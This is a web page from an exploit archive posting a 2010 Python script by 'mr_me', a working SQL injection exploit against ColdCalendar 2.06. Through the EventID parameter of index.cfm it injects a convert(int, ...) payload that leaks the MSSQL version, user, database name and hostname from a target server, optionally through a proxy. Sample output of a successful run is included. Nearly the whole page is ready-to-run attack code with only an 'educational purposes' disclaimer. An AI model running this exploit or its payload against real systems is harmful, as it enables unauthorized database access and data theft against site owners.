Home / os / win7

ColdCalendar 2.06 SQL Injection Exploit

Posted on 07 September 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>ColdCalendar 2.06 SQL Injection Exploit</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=======================================
ColdCalendar 2.06 SQL Injection Exploit
=======================================

#!/usr/bin/python
 
# ColdGen - coldcalender v2.06 Remote 0day SQL Injection Exploit
 
# Vendor: http://www.coldgen.com/
 
# Found by: mr_me
 
# -----------------------------------------------&gt;
 
# Script provided 'as is', without any warranty.
 
# Use for educational purposes only.
 
# Do not use this code to do anything illegal !
 
# -----------------------------------------------&gt;
 
# The vulnerability:
 
# ===================
 
# - SQL Injection in the index.cfm using parameters: EventID
 
#
 
# This tool assumes the target has a MSSQL backend.
 
# ./ColdCal0day.py -p localhost:8080 -t localhost:8500 -d /coldcal/
 
#
 
#   | ----------------------------------------------------------- |
 
#   |  -= ColdCalender v2.06 Remote 0day SQL Injection Exploit =- |
 
#   | --------------[ by mr_me - net-ninja.net ]----------------- |
 
#
 
# (+) Exploiting target @: http://localhost:8500/coldcal/
 
#
 
# (+) Testing Proxy...
 
# (+) Proxy @ localhost:8080
 
# (+) Building Handler..
 
#
 
# (!) Found database version:
 
#
 
#   Microsoft SQL Server 2005 - 9.00.3042.00 (Intel X86)
 
#   Aug  19 2006 20:47:07
 
#   Copyright (c) 1988-2005 Microsoft Corporation
 
#   Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
 
#
 
# (!) Found database hostname: 127.0.0.1
 
#
 
# (!) Found database user: sa
 
#
 
# (!) Found database name: coldcal
 
 
 
import sys, httplib, urllib2, urllib, re
 
from optparse import OptionParser
 
 
 
usage = &quot;./%prog [&lt;options&gt;] -t [target] -d [directory]&quot;
 
usage += &quot;
Example: ./%prog -p localhost:8080 -t localhost:8500 -d /coldcal/&quot;
 
 
 
parser = OptionParser(usage=usage)
 
parser.add_option(&quot;-p&quot;, type=&quot;string&quot;,action=&quot;store&quot;, dest=&quot;proxy&quot;,
 
                  help=&quot;HTTP Proxy &lt;server:port&gt;&quot;)
 
parser.add_option(&quot;-t&quot;, type=&quot;string&quot;, action=&quot;store&quot;, dest=&quot;target&quot;,
 
                  help=&quot;The Target server &lt;server:port&gt;&quot;)
 
parser.add_option(&quot;-d&quot;, type=&quot;string&quot;, action=&quot;store&quot;, dest=&quot;directory&quot;,
 
                  help=&quot;Directory path to the CMS&quot;)
 
(options, args) = parser.parse_args()
 
 
 
def banner():
 
    print &quot;
	| ----------------------------------------------------------- |&quot;
 
    print &quot;	|  -= ColdCalender v2.06 Remote 0day SQL Injection Exploit =- |&quot;
 
    print &quot;	| --------------[ by mr_me - net-ninja.net ]----------------- |
&quot;
 
 
 
if len(sys.argv) &lt; 5:
 
    banner()
 
    parser.print_help()
 
    sys.exit(1)
 
 
 
def getProxy():
 
    try:
 
        pr = httplib.HTTPConnection(options.proxy)
 
        pr.connect()
 
        proxy_handler = urllib2.ProxyHandler({'http': options.proxy})
 
    except(socket.timeout):
 
        print &quot;
(-) Proxy Timed Out&quot;
 
        sys.exit(1)
 
    except(),msg:
 
        print &quot;
(-) Proxy Failed&quot;
 
        sys.exit(1)
 
    return proxy_handler
 
 
 
def setTargetHTTP():
 
    if options.target[0:7] != 'http://':
 
        options.target = &quot;http://&quot; + options.target
 
    return options.target
 
     
 
def getRequest(exploit):
 
    if options.proxy:
 
        try:
 
            proxyfier = urllib2.build_opener(getProxy())
 
            check = proxyfier.open(options.target+options.directory+exploit).read()
 
        except urllib2.HTTPError, error:
 
            check = error.read()
 
        except socket.error:
 
            print &quot;(-) Proxy connection failed&quot;
 
            sys.exit(1)
 
    else:
 
        try:
 
            req = urllib2.Request(options.target+options.directory+exploit)
 
            check = urllib2.urlopen(req).read()
 
        except urllib2.HTTPError, error:
 
            check = error.read()
 
        except urllib2.URLError:
 
            print &quot;(-) Target connection failed, check your address&quot;
 
            sys.exit(1)
 
    return check
 
 
 
basicInfo = {'user: ':'user_name()', 'name: ':'db_name()', 'hostname: ':'host_name()','version: 

	':'@@version'}
 
def basicSploit(info):
 
    return &quot;index.cfm?fuseaction=ViewEventDetails&amp;EventID=1+and+1=convert(int,&quot; + info + &quot;)--&quot;
 
 
 
if __name__ == &quot;__main__&quot;:
 
    banner()
 
    options.target = setTargetHTTP()
 
    print &quot;(+) Exploiting target @: %s&quot; % (options.target+options.directory)
 
    if options.proxy:
 
        print &quot;
(+) Testing Proxy...&quot;
 
        print &quot;(+) Proxy @ %s&quot; % (options.proxy)
 
        print &quot;(+) Building Handler..&quot;
 
 
 
    for key in basicInfo:
 
        getResp = getRequest(basicSploit(basicInfo[key]))
 
        if re.findall(&quot;the nvarchar value '&quot;, getResp):
 
            dbInfo = getResp.split('the nvarchar value '')[1].split('' to data type int')[0]
 
            print &quot;
(!) Found database %s%s&quot; % (key, dbInfo.rstrip())


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-07]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP